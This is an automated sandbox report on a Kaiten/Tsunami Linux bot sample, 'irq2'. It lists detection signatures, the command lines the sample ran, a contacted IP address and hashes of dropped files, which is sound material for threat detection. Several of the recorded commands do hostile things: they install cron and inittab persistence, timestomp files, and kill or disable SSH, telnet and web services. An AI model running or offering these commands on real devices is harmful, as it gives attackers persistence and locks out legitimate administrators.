Analysis Overview
SHA256
8e9cd77c31ba14b925208fa5e3d9f5675909f0a5ebc2399bdd9e36279314abd1
Threat Level: Known bad
The file irq2 was found to be: Known bad.
Malicious Activity Summary
Detects Kaiten/Tsunami Payload
Kaiten family
Kaiten/Tsunami
Creates/modifies Cron job
Enumerates running processes
Indicator Removal: Timestomp
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-27 11:41
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-27 11:41
Reported
2024-10-27 11:44
Platform
debian12-mipsel-20240221-en
Max time kernel
36s
Max time network
12s
Command Line
Signatures
Detects Kaiten/Tsunami Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Kaiten family
Kaiten/Tsunami
Creates/modifies Cron job
| Description | Indicator | Process | Target |
| File opened for modification | /var/spool/cron/crontabs/tmp.EzCKHu | /usr/bin/crontab | N/A |
Enumerates running processes
Indicator Removal: Timestomp
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/touch | N/A |
| N/A | N/A | /bin/sh | N/A |
| N/A | N/A | /usr/bin/touch | N/A |
| N/A | N/A | /bin/sh | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/33 | /usr/bin/killall | N/A |
| File opened for reading | /proc/30/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/829 | /usr/bin/killall | N/A |
| File opened for reading | /proc/6 | /usr/bin/killall | N/A |
| File opened for reading | /proc/341 | /usr/bin/killall | N/A |
| File opened for reading | /proc/33 | /usr/bin/killall | N/A |
| File opened for reading | /proc/42 | /usr/bin/killall | N/A |
| File opened for reading | /proc/6 | /usr/bin/killall | N/A |
| File opened for reading | /proc/29 | /usr/bin/killall | N/A |
| File opened for reading | /proc/22 | /usr/bin/killall | N/A |
| File opened for reading | /proc/831 | /usr/bin/killall | N/A |
| File opened for reading | /proc/26 | /usr/bin/killall | N/A |
| File opened for reading | /proc/679/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/47/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/115 | /usr/bin/killall | N/A |
| File opened for reading | /proc/354/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/18 | /usr/bin/killall | N/A |
| File opened for reading | /proc/698 | /usr/bin/killall | N/A |
| File opened for reading | /proc/841/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/24 | /usr/bin/killall | N/A |
| File opened for reading | /proc/341 | /usr/bin/killall | N/A |
| File opened for reading | /proc/137/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/851 | /usr/bin/killall | N/A |
| File opened for reading | /proc/19/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/3/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/10 | /usr/bin/killall | N/A |
| File opened for reading | /proc/24 | /usr/bin/killall | N/A |
| File opened for reading | /proc/27/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/19/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/180 | /usr/bin/killall | N/A |
| File opened for reading | /proc/10/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/34/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/450/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/4 | /usr/bin/killall | N/A |
| File opened for reading | /proc/6/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/4 | /usr/bin/killall | N/A |
| File opened for reading | /proc/1/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/31/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/6/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/systemctl | N/A |
| File opened for reading | /proc/813 | /usr/bin/killall | N/A |
| File opened for reading | /proc/37 | /usr/bin/killall | N/A |
| File opened for reading | /proc/732/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/11 | /usr/bin/killall | N/A |
| File opened for reading | /proc/44/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/59/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/13 | /usr/bin/killall | N/A |
| File opened for reading | /proc/42/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/114 | /usr/bin/killall | N/A |
| File opened for reading | /proc/809 | /usr/bin/killall | N/A |
| File opened for reading | /proc/5 | /usr/bin/killall | N/A |
| File opened for reading | /proc/818 | /usr/bin/killall | N/A |
| File opened for reading | /proc/114 | /usr/bin/killall | N/A |
| File opened for reading | /proc/26 | /usr/bin/killall | N/A |
| File opened for reading | /proc/818/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/47 | /usr/bin/killall | N/A |
| File opened for reading | /proc/2 | /usr/bin/killall | N/A |
| File opened for reading | /proc/114 | /usr/bin/killall | N/A |
| File opened for reading | /proc/710/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/710/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/1/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/4 | /usr/bin/killall | N/A |
| File opened for reading | /proc/28/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/30/stat | /usr/bin/killall | N/A |
Processes
/tmp/irq2
[/tmp/irq2]
/bin/sh
[sh -c touch -acmr /bin/ls /tmp/irq2]
/usr/bin/touch
[touch -acmr /bin/ls /tmp/irq2]
/bin/sh
[sh -c (crontab -l | grep -v "/tmp/irq2" | grep -v "no cron" | grep -v "lesshts/run.sh" > /var/run/.x00740882966) > /dev/null 2>&1]
/usr/bin/crontab
[crontab -l]
/usr/bin/grep
[grep -v /tmp/irq2]
/usr/bin/grep
[grep -v no cron]
/usr/bin/grep
[grep -v lesshts/run.sh]
/bin/sh
[sh -c echo "* * * * * /tmp/irq2 > /dev/null 2>&1 &" >> /var/run/.x00740882966]
/bin/sh
[sh -c crontab /var/run/.x00740882966]
/usr/bin/crontab
[crontab /var/run/.x00740882966]
/bin/sh
[sh -c rm -rf /var/run/.x00740882966]
/usr/bin/rm
[rm -rf /var/run/.x00740882966]
/bin/sh
[sh -c cat /etc/inittab | grep -v "/tmp/irq2" > /etc/inittab2]
/usr/bin/cat
[cat /etc/inittab]
/usr/bin/grep
[grep -v /tmp/irq2]
/bin/sh
[sh -c echo "0:2345:respawn:/tmp/irq2" >> /etc/inittab2]
/bin/sh
[sh -c cat /etc/inittab2 > /etc/inittab]
/bin/sh
[sh -c rm -rf /etc/inittab2]
/usr/bin/rm
[rm -rf /etc/inittab2]
/bin/sh
[sh -c touch -acmr /bin/ls /etc/inittab]
/usr/bin/touch
[touch -acmr /bin/ls /etc/inittab]
/bin/sh
[sh -c /bin/uname -n]
/bin/uname
[/bin/uname -n]
/bin/sh
[sh -c /bin/uname -n]
/bin/uname
[/bin/uname -n]
/bin/sh
[sh -c /bin/uname -n]
/bin/uname
[/bin/uname -n]
/bin/sh
[sh -c kill -9 `cat /var/run/httpd.pid` > /dev/null 2>&1 &]
/bin/sh
[sh -c service httpd stop > /dev/null 2>&1 &]
/usr/bin/cat
[cat /var/run/httpd.pid]
/bin/sh
[sh -c killall -9 mini_httpd > /dev/null 2>&1 &]
/usr/sbin/service
[service httpd stop]
/bin/sh
[sh -c killall -9 minihttpd > /dev/null 2>&1 &]
/usr/bin/killall
[killall -9 mini_httpd]
/usr/bin/basename
[basename /usr/sbin/service]
/bin/sh
[sh -c kill -9 `cat /var/run/thttpd.pid` > /dev/null 2>&1 &]
/usr/bin/killall
[killall -9 minihttpd]
/usr/bin/basename
[basename /usr/sbin/service]
/bin/sh
[sh -c nvram set httpd_enable=0 > /dev/null 2>&1]
/usr/bin/cat
[cat /var/run/thttpd.pid]
/usr/bin/systemctl
[systemctl list-unit-files --full --type=socket]
/usr/bin/sed
[sed -ne s/\.socket\s*[a-z]*\s*$/.socket/p]
/bin/sh
[sh -c nvram set http_enable=0 > /dev/null 2>&1]
/bin/sh
[sh -c killall -9 httpd > /dev/null 2>&1 &]
/bin/sh
[sh -c service telnetd stop > /dev/null 2>&1 &]
/usr/bin/killall
[killall -9 httpd]
/bin/sh
[sh -c service sshd stop > /dev/null 2>&1 &]
/usr/sbin/service
[service telnetd stop]
/usr/sbin/service
[service sshd stop]
/bin/sh
[sh -c killall -9 telnetd > /dev/null 2>&1 &]
/usr/bin/basename
[basename /usr/sbin/service]
/usr/bin/basename
[basename /usr/sbin/service]
/bin/sh
[sh -c killall -9 utelnetd > /dev/null 2>&1 &]
/usr/bin/killall
[killall -9 telnetd]
/usr/bin/basename
[basename /usr/sbin/service]
/usr/bin/basename
[basename /usr/sbin/service]
/bin/sh
[sh -c killall -9 dropbear > /dev/null 2>&1 &]
/usr/bin/killall
[killall -9 utelnetd]
/bin/sh
[sh -c killall -9 sshd > /dev/null 2>&1 &]
/usr/bin/killall
[killall -9 dropbear]
/usr/bin/sed
[sed -ne s/\.socket\s*[a-z]*\s*$/.socket/p]
/usr/bin/systemctl
[systemctl list-unit-files --full --type=socket]
/usr/bin/sed
[sed -ne s/\.socket\s*[a-z]*\s*$/.socket/p]
/usr/bin/systemctl
[systemctl list-unit-files --full --type=socket]
/usr/bin/killall
[killall -9 sshd]
/bin/sh
[sh -c killall -9 lighttpd > /dev/null 2>&1 &]
/usr/bin/killall
[killall -9 lighttpd]
/usr/local/sbin/systemctl
[systemctl stop httpd.service]
/usr/local/bin/systemctl
[systemctl stop httpd.service]
/usr/sbin/systemctl
[systemctl stop httpd.service]
/usr/bin/systemctl
[systemctl stop httpd.service]
/usr/local/sbin/systemctl
[systemctl stop telnetd.service]
/usr/local/bin/systemctl
[systemctl stop telnetd.service]
/usr/sbin/systemctl
[systemctl stop telnetd.service]
/usr/bin/systemctl
[systemctl stop telnetd.service]
/usr/local/sbin/systemctl
[systemctl stop sshd.service]
/usr/local/bin/systemctl
[systemctl stop sshd.service]
/usr/sbin/systemctl
[systemctl stop sshd.service]
/usr/bin/systemctl
[systemctl stop sshd.service]
Network
| Country | Destination | Domain | Proto |
| RU | 195.133.232.91:8080 | tcp | |
| US | 1.1.1.1:53 | debian12-mipsel-20240221-en-14 | udp |
| US | 1.1.1.1:53 | debian12-mipsel-20240221-en-14 | udp |
| US | 1.1.1.1:53 | debian12-mipsel-20240221-en-14 | udp |
| US | 1.1.1.1:53 | debian12-mipsel-20240221-en-14 | udp |
Files
memory/743-1-0x00400000-0x005777e8-memory.dmp
/run/.x00740882966
| MD5 | 65c1bbfcb74ec6f5c0efb513ebf1e69d |
| SHA1 | a7a758354c25c91d88d9da83f90552bd9f973e9b |
| SHA256 | 5ca8963c17b0b8ff4dc3d6ac469b22eed780405b6574ab26b7da3074cc089001 |
| SHA512 | b86ac43a202e47d1ec305904b7227f9c5b32389b7702f9fa0856674812ae7c33f9a410901b14f6e9428fc14428c5adfaac20690d4d74c8755582566890e06abc |
/var/spool/cron/crontabs/tmp.EzCKHu
| MD5 | 86914499bb6f61e546b730041a1f6ed9 |
| SHA1 | 984e52fa12f9fda8c27d801a350158e1a3345d7b |
| SHA256 | c69f56374b512e816ad31ea035f4ae2f16127096a52e359457982b0ddf3fa1c1 |
| SHA512 | 129913a5dbe6e6bb5fabab4e5a76291af0cf8f457f820dba725bf569411902df82a54ccb16978aa1f0b8d2caa27b8511a2ec6c2c637a59d4b4822947207499b9 |
/etc/inittab2
| MD5 | 23a6588a2dbaf98c20dd9ad548f99576 |
| SHA1 | 1d4504154b3abcef8b652f4832de895669737941 |
| SHA256 | 6c7a9e9b6883cbcff02f673e5fb8bcdbe0b23459f0e063b80cba76ad22b1aff0 |
| SHA512 | de52be0bb66cc880f2cdd0cfc9d47949cbfa161a286d48d22fc22b42f484fcdb4317f34ee05194ab8f61b54e444d04c69459c5bb2fa4ebf8542194949fbc4837 |